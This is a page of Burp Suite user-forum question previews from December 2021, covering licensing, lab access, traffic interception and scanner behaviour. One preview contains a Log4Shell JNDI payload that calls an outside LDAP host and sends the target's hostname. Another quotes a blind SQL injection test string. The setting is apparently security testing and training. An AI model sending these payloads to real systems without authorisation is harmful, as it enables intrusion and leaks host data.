Burp Suite User Forum

Create new post

my license has been used many times now is not working

Hello Support team happy new year i need to disable the old license and generate a new one in order to disable the old devices over the cloud thanks

Last updated: Dec 29, 2021 09:42AM UTC | 1 Agent replies | 0 Community replies | How do I?

burp collab client - Wont work properly

Hi there, I need help enabling burp collab client to work correctly. I do the health check and am not sure how to fix the problems that arise and i dont see full solutions online.

Last updated: Dec 29, 2021 08:27AM UTC | 1 Agent replies | 0 Community replies | How do I?

Bad Request in Web Academy labs..!!!!

Hi all, I'm totally new to web security want to learn web security and I've found out portswigger web labs. this is my first day starting to learn about websec. but, when I tried to access my first lab as suggested by...

Last updated: Dec 24, 2021 10:24AM UTC | 7 Agent replies | 9 Community replies | How do I?

How do I know if https requests are failing to be decrypted?

I am attempting to mitm an android emulator on my computer with burpsuite. I am able to see https traffic of insecure things like assets, but I see no traffic for data being posted to and from the app, over https. I know the...

Last updated: Dec 24, 2021 08:53AM UTC | 2 Agent replies | 3 Community replies | How do I?

Scanner does not honor match/replace rules

I have added a log4j match/replace rule on the User-Agent like this Match: ^User-Agent.*$ Replace: User-Agent: \${jndi:ldap://log4shell.huntress.com:1389/hostname=\${env:HOSTNAME}/guid} The rule works just fine when...

Last updated: Dec 23, 2021 08:09PM UTC | 1 Agent replies | 1 Community replies | How do I?

LAB: Exploiting HTTP request smuggling to perform web cache poisoning

Hello everyone! Im having troubles with this lab. I tried even to follow the youtube videos to get with the solution and not even that helps. Im getting a 400 and {"error":"Invalid request"} I tried also to switch...

Last updated: Dec 23, 2021 12:43AM UTC | 4 Agent replies | 5 Community replies | How do I?

Digest Auth in Burp was removed?

Hi, What happened with Digest authentication support? https://portswigger.net/burp/documentation/desktop/options/connections "Supported authentication types are: basic, NTLMv1, and NTLMv2" In the previous versions...

Last updated: Dec 22, 2021 12:18PM UTC | 4 Agent replies | 5 Community replies | How do I?

Any Solution to "Network Protocol Error" in Firefox while Using Burp!

Hi Guys, I've been seeing an error on some websites while using burp the error on firefox goes like --- Network Protocol Error An error occurred during a connection to target.com. The page you are trying to...

Last updated: Dec 22, 2021 11:31AM UTC | 1 Agent replies | 0 Community replies | How do I?

scanning ip ranges ?

Hello, given we have set of ip ranges to scan. how i can do with burp to set different ip ranges in the target scope ? can someone advise ?

Last updated: Dec 22, 2021 08:18AM UTC | 1 Agent replies | 0 Community replies | How do I?

Find and replace with $ sign in replace not working

I am attempting to use find and replace to replace the user agent string with a jndi payload. However the dollar sign in the replacement string causes the replacement not to work. For instance: Match:...

Last updated: Dec 21, 2021 07:19PM UTC | 2 Agent replies | 2 Community replies | How do I?

Stop scan

I need to stop scan on paticular GET/POST keyword. If web page says: "Error. Could not find..." I want previous GET/POST. To stop at that message.

Last updated: Dec 21, 2021 10:44AM UTC | 4 Agent replies | 3 Community replies | How do I?

Upgrade Burp Enterprise, Linux Distro

Would anyone have a link to detail the steps in upgrading Enterprise Edition within a Linux environment? My current version is; 2021.12.1-8680, Java version: 11.0.10 Any advice appreciated.

Last updated: Dec 21, 2021 10:02AM UTC | 1 Agent replies | 0 Community replies | How do I?

GraphQL mutation for extensions

Does graphql support mutations of a given site to add an extension?

Last updated: Dec 21, 2021 09:13AM UTC | 1 Agent replies | 0 Community replies | How do I?

Can my employer purchase the exam for me?

How can my employer purchase the exam for me? Don't you have something like a voucher system or can you email us a quotation?

Last updated: Dec 21, 2021 08:59AM UTC | 1 Agent replies | 0 Community replies | How do I?

Is there some different configurations required for intercepting Flutter and ARM based mobile application

I'm not able to intercept the traffic of the ARM android application, however i can clearly see traffic passing via wireshark. The application does not have ssl pinning and burp is properly configured with emulator as i'm...

Last updated: Dec 21, 2021 08:14AM UTC | 1 Agent replies | 0 Community replies | How do I?

Cannot access the web security lab

I can not access any lab on your website using Microsoft Edge. When i click "Access the lab", it shows the error message is "ERR_CONNECTION_TIMED_OUT". I tried another device and browser but they have the same issue. Can...

Last updated: Dec 21, 2021 08:12AM UTC | 2 Agent replies | 2 Community replies | How do I?

plaintext password

Hi there, if I capture a login request and view a password in plaintext form, would this indicate a vulnerability? Considering that if you capture it in some applications like facebook it will appear encrypted.

Last updated: Dec 20, 2021 02:19PM UTC | 1 Agent replies | 0 Community replies | How do I?

Scan DIV class

Hi! I need to scan just a part of web page - DIV class. This class is changing time to time, and I want to find how and when it changes. It shoud be random, but I don't think it is. For example, clock on web page changes...

Last updated: Dec 20, 2021 01:40PM UTC | 2 Agent replies | 2 Community replies | How do I?

Burp Pro isn't intercepting HTTP requests from Terminal

Hello, I am using Burp Pro and it doesn't intercept any HTTP request from Terminal on my macOS. Help me, please. Thank you.

Last updated: Dec 20, 2021 11:54AM UTC | 1 Agent replies | 0 Community replies | How do I?

Why simple quote is necessary in SQL Blind Injection using TrackingID?

I'm in first lab of Blindd SQL Injection and payload for test is: TrackingId=xyz' AND '1'='1 Why is necessary this quotes in '1' and '1?

Last updated: Dec 17, 2021 02:51PM UTC | 1 Agent replies | 0 Community replies | How do I?

Page 116 of 310

Burp Suite Support Center

Your source for help and advice on all things Burp-related.

Burp Suite Support Center image